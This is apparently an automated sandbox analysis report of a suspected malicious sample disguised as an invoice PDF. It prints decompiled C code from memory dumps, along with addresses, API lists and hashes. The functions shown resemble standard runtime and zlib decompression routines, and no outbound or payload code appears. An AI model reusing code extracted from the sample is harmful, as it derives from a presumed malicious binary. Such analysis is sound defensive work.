								 *(_a4 + 0x50) =  *_t240;
							}
							E0132C981(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                            0x0132e8ed
                            0x0132e8f4
                            0x0132e8f9
                            0x0132e8ff
                            0x0132e902
                            0x0132e908
                            0x0132e90d
                            0x0132e912
                            0x0132e912
                            0x0132e918
                            0x0132e91d
                            0x0132e922
                            0x0132e922
                            0x0132e929
                            0x0132e92e
                            0x0132e933
                            0x0132e933
                            0x0132e93a
                            0x0132e93f
                            0x0132e944
                            0x0132e944
                            0x0132e94b
                            0x0132e950
                            0x0132e955
                            0x0132e955
                            0x0132e95d
                            0x0132e96d
                            0x0132e97f
                            0x0132e991
                            0x0132e9a4
                            0x0132e9b6
                            0x0132e9be
                            0x0132e9c3
                            0x0132e9c8
                            0x0132e9c8
                            0x0132e9cf
                            0x0132e9d4
                            0x0132e9d4
                            0x0132e9db
                            0x0132e9e0
                            0x0132e9e0
                            0x0132e9e7
                            0x0132e9ec
                            0x0132e9ec
                            0x0132e9f3
                            0x0132e9f8
                            0x0132e9f8
                            0x0132ea02
                            0x0132ea04
                            0x0132ea3e
                            0x0132ea06
                            0x0132ea0b
                            0x0132ea2f
                            0x0132ea37
                            0x0132ea2b
                            0x0132ea2b
                            0x0132ea41
                            0x0132ea48
                            0x0132ea4a
                            0x0132ea6c
                            0x0132ea74
                            0x0132ea77
                            0x0132ea77
                            0x0132ea79
                            0x0132ea79
                            0x0132ea84
                            0x0132ea8a
                            0x0132ea8f
                            0x0132ea96
                            0x0132ead0
                            0x0132eadb
                            0x0132eae1
                            0x0132eae4
                            0x0132eae7
                            0x0132eaf3
                            0x0132eafb
                            0x0132ea98
                            0x0132ea9b
                            0x0132eaa7
                            0x0132eaad
                            0x0132eab3
                            0x0132eab6
                            0x0132eabf
                            0x0132eabf
                            0x0132eafe
                            0x0132eb0c
                            0x0132eb12
                            0x0132eb19
                            0x0132eb1b
                            0x0132eb1b
                            0x0132eb22
                            0x0132eb24
                            0x0132eb24
                            0x0132eb2b
                            0x0132eb2d
                            0x0132eb2d
                            0x0132eb34
                            0x0132eb36
                            0x0132eb36
                            0x0132eb3d
                            0x0132eb3f
                            0x0132eb3f
                            0x0132eb4c
                            0x0132eb4f
                            0x0132eb86
                            0x0132eb51
                            0x0132eb51
                            0x0132eb54
                            0x0132eb7f
                            0x0132eb74
                            0x0132eb74
                            0x0132eb88
                            0x0132eb90
                            0x0132eb93
                            0x0132ebb2
                            0x0132ebb7
                            0x0132ebb7
                            0x0132ebb9
                            0x0132ebbe
                            0x0132ebca
                            0x0132ebc0
                            0x0132ebc3
                            0x0132ebc3
                            0x0132ebcf
                            0x0132ebcf
                            0x0132eb95
                            0x0132eb98
                            0x0132eba7
                            0x00000000
                            0x0132eba7
                            0x0132eb9a
                            0x0132eb9d
                            0x0132eb9f
                            0x0132eb9f
                            0x00000000
                            0x0132eb9d
                            0x0132eb56
                            0x0132eb59
                            0x0132eb6f
                            0x00000000
                            0x0132eb6f
                            0x0132eb5e
                            0x0132eb60
                            0x0132eb60
                            0x0132eb5e
                            0x00000000
                            0x0132eb4f
                            0x0132ea51
                            0x0132ea5f
                            0x0132ea67
                            0x00000000
                            0x0132ea67
                            0x0132ea55
                            0x0132ea5a
                            0x0132ea5a
                            0x00000000
                            0x0132ea55
                            0x0132ea12
                            0x0132ea20
                            0x0132ea28
                            0x00000000
                            0x0132ea28
                            0x0132ea16
                            0x0132ea1b
                            0x0132ea1b
                            0x0132ea16

                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0132E8DA,?,?,00000008,?,?,0132E57A,00000000), ref: 0132EB0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            • Opcode ID: f7a939b84d2b81a7d0db40aa0b4c8b6c7118749d898c3aa0e79022cf669e88cd
                            • Instruction ID: e680c4861329298bf0e630dc0037fd99bfa7232d553f2c3d16c2c1a3e8bc8656
                            • Opcode Fuzzy Hash: f7a939b84d2b81a7d0db40aa0b4c8b6c7118749d898c3aa0e79022cf669e88cd
                            • Instruction Fuzzy Hash: 6BB14B316106199FEB15DF2CC486B647FE0FF05368F298669E99ACF2A1C335E981CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131B912, Relevance: 1.5, Strings: 1, Instructions: 214COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E0131B912(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E0131C500(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0131ADDC(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E0131C7E0(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0131ADDC(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E0131C6AE(_t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0131ADDC(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E0131C30B(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E0131C4E8(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0131BF17(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0131C455(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E0131C4C9(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E0131BE51(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0131C1E3(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                            0x0131b917
                            0x0131b91a
                            0x0131b91e
                            0x0131b921
                            0x0131b925
                            0x0131b928
                            0x0131b996
                            0x0131b999
                            0x0131b9e8
                            0x0131b9e8
                            0x0131b9eb
                            0x0131b958
                            0x0131b95a
                            0x0131b95f
                            0x0131b961
                            0x0131ba06
                            0x0131ba0a
                            0x0131ba13
                            0x0131ba18
                            0x0131ba19
                            0x0131ba1d
                            0x0131ba1f
                            0x0131ba24
                            0x0131ba27
                            0x0131ba29
                            0x0131ba52
                            0x0131ba52
                            0x0131ba55
                            0x0131ba58
                            0x0131ba5f
                            0x0131ba61
                            0x0131ba64
                            0x0131ba66
                            0x0131ba6a
                            0x0131ba6a
                            0x0131ba6d
                            0x0131ba78
                            0x0131ba78
                            0x0131ba7a
                            0x0131ba7a
                            0x0131ba7c
                            0x0131ba82
                            0x0131ba82
                            0x0131ba87
                            0x0131ba8a
                            0x0131ba95
                            0x0131ba95
                            0x0131ba97
                            0x0131ba97
                            0x0131baa2
                            0x0131baa6
                            0x0131baa6
                            0x0131baa9
                            0x0131baaf
                            0x0131bab1
                            0x0131bab4
                            0x0131bac4
                            0x0131bac9
                            0x0131bac9
                            0x0131bade
                            0x0131bae3
                            0x0131bae6
                            0x0131baeb
                            0x0131baee
                            0x0131baf0
                            0x0131baf2
                            0x0131baf5
                            0x0131baf8
                            0x0131bb05
                            0x0131bb0a
                            0x0131bb0a
                            0x0131baf8
                            0x0131bb11
                            0x0131bb16
                            0x0131bb19
                            0x0131bb1e
                            0x0131bb21
                            0x0131bb23
                            0x0131bb30
                            0x0131bb35
                            0x0131bb23
                            0x0131bb38
                            0x0131bb3b
                            0x0131bb40
                            0x0131bb40
                            0x0131ba8c
                            0x0131ba8f
                            0x00000000
                            0x00000000
                            0x0131ba91
                            0x00000000
                            0x0131ba91
                            0x0131ba7e
                            0x0131ba80
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131ba80
                            0x0131ba6f
                            0x0131ba72
                            0x00000000
                            0x00000000
                            0x0131ba74
                            0x00000000
                            0x0131ba74
                            0x0131ba68
                            0x0131ba68
                            0x0131ba68
                            0x00000000
                            0x0131ba68
                            0x0131ba5a
                            0x0131ba5d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131ba5d
                            0x0131ba2d
                            0x0131ba30
                            0x0131ba32
                            0x0131ba3a
                            0x0131ba3c
                            0x0131ba46
                            0x0131ba48
                            0x0131ba4a
                            0x00000000
                            0x00000000
                            0x0131ba4c
                            0x0131ba50
                            0x0131ba50
                            0x00000000
                            0x0131ba50
                            0x0131ba3e
                            0x00000000
                            0x0131ba3e
                            0x0131ba34
                            0x00000000
                            0x0131ba34
                            0x0131ba0c
                            0x00000000
                            0x0131ba0c
                            0x0131b967
                            0x0131b967
                            0x00000000
                            0x0131b967
                            0x0131b9f2
                            0x0131b9f2
                            0x0131b9f5
                            0x0131b9c7
                            0x0131b9c7
                            0x0131b9c8
                            0x0131b9ca
                            0x0131b9cc
                            0x00000000
                            0x0131b9cc
                            0x0131b9f7
                            0x0131b9fa
                            0x00000000
                            0x00000000
                            0x0131ba00
                            0x0131b96f
                            0x0131b96f
                            0x00000000
                            0x0131b96f
                            0x0131b99b
                            0x0131b9de
                            0x00000000
                            0x0131b9de
                            0x0131b99d
                            0x0131b9a0
                            0x0131b9d3
                            0x0131b9d5
                            0x00000000
                            0x0131b9d5
                            0x0131b9a2
                            0x0131b9a5
                            0x0131b9c3
                            0x0131b9c3
                            0x0131b9c3
                            0x0131b9c3
                            0x00000000
                            0x0131b9c3
                            0x0131b9a7
                            0x0131b9aa
                            0x0131b9bc
                            0x00000000
                            0x0131b9bc
                            0x0131b9ac
                            0x0131b9af
                            0x00000000
                            0x00000000
                            0x0131b9b3
                            0x00000000
                            0x0131b9b3
                            0x0131b92a
                            0x00000000
                            0x00000000
                            0x0131b930
                            0x0131b933
                            0x0131b973
                            0x0131b973
                            0x0131b976
                            0x0131b98f
                            0x00000000
                            0x0131b98f
                            0x0131b978
                            0x0131b978
                            0x0131b97b
                            0x00000000
                            0x00000000
                            0x0131b97e
                            0x0131b981
                            0x00000000
                            0x00000000
                            0x0131b983
                            0x0131b986
                            0x00000000
                            0x0131b986
                            0x0131b935
                            0x0131b96e
                            0x00000000
                            0x0131b96e
                            0x0131b93a
                            0x00000000
                            0x00000000
                            0x0131b943
                            0x00000000
                            0x00000000
                            0x0131b948
                            0x00000000
                            0x00000000
                            0x0131b94d
                            0x00000000
                            0x00000000
                            0x0131b956
                            0x00000000
                            0x00000000
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                            • Instruction ID: 7f8ba84c2df4d29d04c18b193ee4c309c0fb2fd6757eabc39b74cfdd3333e708
                            • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                            • Instruction Fuzzy Hash: 0251B07224474A5BFF3D592C8894BBFEBBB9B1220DF08040ADA82D769ED615D607C351
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328587, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01328587() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x134655c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                            0x01328587
                            0x0132858f
                            0x01328597

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: d47de79c7a1478008edbade1156130f54a90bec2d8deee03812fe4eb34473742
                            • Instruction ID: 6a0b74d1a63a491a7d3ee290b25c822ea2796be564eee9ae90c6987516977aef
                            • Opcode Fuzzy Hash: d47de79c7a1478008edbade1156130f54a90bec2d8deee03812fe4eb34473742
                            • Instruction Fuzzy Hash: 4FA011B8A00200CBC3A08E3AA20A2083AECAA02B80F0080A8B008C000CEB308000AF00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013158C2, Relevance: .8, Instructions: 838COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E013158C2(signed char* __ebx, unsigned int __edx, intOrPtr __edi, signed int __esi) {
				signed int _t782;
				signed int _t812;
				signed int _t814;
				signed int _t820;
				signed char* _t824;
				signed char* _t825;
				intOrPtr _t827;
				signed int _t832;
				signed int _t835;
				signed int _t953;
				signed char* _t954;
				intOrPtr _t956;
				signed char** _t982;
				signed char** _t989;
				signed int _t1101;
				unsigned int _t1103;
				signed int _t1104;
				signed int _t1105;
				intOrPtr _t1108;
				intOrPtr _t1109;
				intOrPtr _t1151;
				signed int _t1152;
				signed char** _t1153;
				signed int _t1179;
				unsigned int _t1181;
				signed int _t1185;
				intOrPtr _t1187;
				signed int _t1188;
				void* _t1192;

				L0:
				while(1) {
					L0:
					_t1179 = __esi;
					_t1151 = __edi;
					_t1103 = __edx;
					_t954 = __ebx;
					if(__esi >= 0xe) {
						goto L184;
					} else {
						goto L181;
					}
					while(1) {
						L181:
						if(__ebp == 0) {
							break;
						}
						L182:
						__eax =  *__ebx & 0x000000ff;
						__eax = ( *__ebx & 0x000000ff) << __cl;
						__ebx = __ebx + 1;
						__edx = __edx + __eax;
						 *(__esp + 0x14) = __ebx;
						__esi = __esi + 8;
						 *(__esp + 0x10) = __edx;
						__ebp = __ebp - 1;
						if(__esi < 0xe) {
							continue;
						} else {
							L183:
							goto L184;
						}
						L362:
					}
					L102:
					_t1152 =  *(_t1192 + 0x10);
					L103:
					_t1108 =  *((intOrPtr*)(_t1192 + 0x4c));
					L104:
					_t989 =  *(_t1192 + 0x48);
					_t956 =  *((intOrPtr*)(_t1192 + 0x24));
					_t989[3] =  *(_t1192 + 0x20);
					_t989[4] =  *(_t1192 + 0x1c);
					_t989[1] = _t1185;
					_t1187 =  *((intOrPtr*)(_t1192 + 0x28));
					 *_t989 =  *(_t1192 + 0x14);
					 *(_t956 + 0x3c) = _t1152;
					 *(_t956 + 0x40) = _t1179;
					if( *(_t956 + 0x2c) != 0) {
						L109:
						_t812 = E01316930(_t989, _t989[3], _t1187 - _t989[4]);
						_t1192 = _t1192 + 0xc;
						if(_t812 == 0) {
							L346:
							_t989 =  *(_t1192 + 0x48);
							goto L347;
						} else {
							L110:
							 *((intOrPtr*)(_t956 + 4)) = 0x3f52;
							L111:
							return 0xfffffffc;
						}
					} else {
						L105:
						if(_t1187 == _t989[4]) {
							L347:
							_t814 =  *(_t1192 + 0x38) - _t989[1];
							_t1188 = _t1187 - _t989[4];
							_t989[2] =  &(_t989[2][_t814]);
							_t989[5] =  &(_t989[5][_t1188]);
							 *((intOrPtr*)(_t956 + 0x20)) =  *((intOrPtr*)(_t956 + 0x20)) + _t1188;
							 *(_t1192 + 0x38) = _t814;
							if(( *(_t956 + 0xc) & 0x00000004) == 0) {
								L352:
								_t1153 =  *(_t1192 + 0x48);
							} else {
								L348:
								if(_t1188 == 0) {
									goto L352;
								} else {
									L349:
									_push(_t1188);
									_push(_t989[3] - _t1188);
									_push( *(_t956 + 0x1c));
									if( *(_t956 + 0x14) == 0) {
										_t824 = L01316A20();
										_t1153 =  *(_t1192 + 0x54);
										_t1192 = _t1192 + 0xc;
										 *(_t956 + 0x1c) = _t824;
										_t1153[0xc] = _t824;
									} else {
										_t825 = E01316CA0();
										_t1153 =  *(_t1192 + 0x54);
										_t1192 = _t1192 + 0xc;
										 *(_t956 + 0x1c) = _t825;
										_t1153[0xc] = _t825;
									}
								}
							}
							L353:
							_t1109 =  *((intOrPtr*)(_t956 + 4));
							if(_t1109 == 0x3f47) {
								L356:
								_t1181 = 0x100;
							} else {
								L354:
								if(_t1109 == 0x3f42) {
									goto L356;
								} else {
									L355:
									_t1181 = 0;
								}
							}
							L357:
							 *(_t1192 + 0x48) = 0x80;
							asm("sbb ecx, ecx");
							_t816 =  ==  ?  *(_t1192 + 0x48) : 0;
							_t817 = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181;
							_t818 = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181 +  *(_t956 + 0x40);
							_t1153[0xb] = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181 +  *(_t956 + 0x40);
							if( *(_t1192 + 0x38) != 0) {
								L359:
								if( *((intOrPtr*)(_t1192 + 0x4c)) != 4) {
									L361:
									return  *(_t1192 + 0x2c);
								} else {
									goto L360;
								}
							} else {
								L358:
								if(_t1188 == 0) {
									L360:
									_t820 =  *(_t1192 + 0x2c);
									_t821 =  ==  ? 0xfffffffb : _t820;
									return  ==  ? 0xfffffffb : _t820;
								} else {
									goto L359;
								}
							}
						} else {
							L106:
							_t827 =  *((intOrPtr*)(_t956 + 4));
							if(_t827 >= 0x3f51) {
								goto L347;
							} else {
								L107:
								if(_t827 < 0x3f4e) {
									goto L109;
								} else {
									L108:
									if(_t1108 == 4) {
										goto L347;
									} else {
										goto L109;
									}
								}
							}
						}
					}
					goto L362;
					L184:
					_t1179 = _t1179 - 0xe;
					_t1104 = _t1103 >> 5;
					 *((intOrPtr*)(_t1151 + 0x64)) = (_t1103 & 0x0000001f) + 0x101;
					_t1105 = _t1104 >> 5;
					 *((intOrPtr*)(_t1151 + 0x68)) = (_t1104 & 0x0000001f) + 1;
					_t1103 = _t1105 >> 4;
					 *(_t1192 + 0x10) = _t1103;
					 *((intOrPtr*)(_t1151 + 0x60)) = (_t1105 & 0x0000000f) + 4;
					if( *((intOrPtr*)(_t1151 + 0x64)) > 0x11e) {
						L198:
						_t982[6] = "too many length or distance symbols";
						 *(_t1151 + 4) = 0x3f51;
						goto L178;
					} else {
						L185:
						if( *((intOrPtr*)(_t1151 + 0x68)) > 0x1e) {
							goto L198;
						} else {
							L186:
							 *(_t1151 + 0x6c) = 0;
							 *(_t1151 + 4) = 0x3f45;
							L187:
							if( *(_t1151 + 0x6c) >=  *((intOrPtr*)(_t1151 + 0x60))) {
								L193:
								while( *(_t1151 + 0x6c) < 0x13) {
									L195:
									 *(_t1151 + 0x74 + ( *(0x13322b0 +  *(_t1151 + 0x6c) * 2) & 0x0000ffff) * 2) = 0;
									 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
								}
								L196:
								_t832 = _t1151 + 0x534;
								 *(_t1151 + 0x58) = 7;
								 *(_t1151 + 0x50) = _t832;
								 *(_t1151 + 0x70) = _t832;
								_t835 = E01316F90(0, _t1151 + 0x74, 0x13, _t1151 + 0x70, _t1151 + 0x58, _t1151 + 0x2f4);
								_t1192 = _t1192 + 0x18;
								 *(_t1192 + 0x2c) = _t835;
								if(_t835 == 0) {
									L199:
									 *(_t1151 + 0x6c) = 0;
									 *(_t1151 + 4) = 0x3f46;
									goto L200;
								} else {
									L197:
									_t982 =  *(_t1192 + 0x48);
									_t1103 =  *(_t1192 + 0x10);
									_t982[6] = "invalid code lengths set";
									 *(_t1151 + 4) = 0x3f51;
									while(1) {
										L178:
										_t782 =  *(_t1151 + 4) - 0x3f34;
										if(_t782 > 0x1e) {
											break;
										}
										L1:
										switch( *((intOrPtr*)(_t782 * 4 +  &M01316560))) {
											case 0:
												L2:
												_t793 =  *(_t1151 + 0xc);
												if(_t793 != 0) {
													L4:
													__eflags = _t1179 - 0x10;
													if(_t1179 >= 0x10) {
														L9:
														__eflags = _t793 & 0x00000002;
														if((_t793 & 0x00000002) == 0) {
															L14:
															_t794 =  *(_t1151 + 0x24);
															 *(_t1151 + 0x14) = 0;
															__eflags = _t794;
															if(_t794 != 0) {
																 *(_t794 + 0x30) = 0xffffffff;
															}
															L16:
															__eflags =  *(_t1151 + 0xc) & 0x00000001;
															if(( *(_t1151 + 0xc) & 0x00000001) == 0) {
																L27:
																_t982[6] = "incorrect header check";
																 *(_t1151 + 4) = 0x3f51;
															} else {
																L17:
																_t797 = (_t1103 >> 8) + ((_t1103 & 0x000000ff) << 8);
																__eflags = _t797 % 0x1f;
																_t1103 =  *(_t1192 + 0x10);
																if(_t797 % 0x1f != 0) {
																	_t982 =  *(_t1192 + 0x48);
																	goto L27;
																} else {
																	L18:
																	__eflags = (_t1103 & 0x0000000f) - 8;
																	if((_t1103 & 0x0000000f) == 8) {
																		_t1103 = _t1103 >> 4;
																		_t1179 = _t1179 - 4;
																		 *(_t1192 + 0x10) = _t1103;
																		_t988 = (_t1103 & 0x0000000f) + 8;
																		__eflags =  *(_t1151 + 0x28);
																		if( *(_t1151 + 0x28) == 0) {
																			 *(_t1151 + 0x28) = _t988;
																		}
																		L22:
																		__eflags = _t988 - 0xf;
																		if(_t988 > 0xf) {
																			L25:
																			_t982 =  *(_t1192 + 0x48);
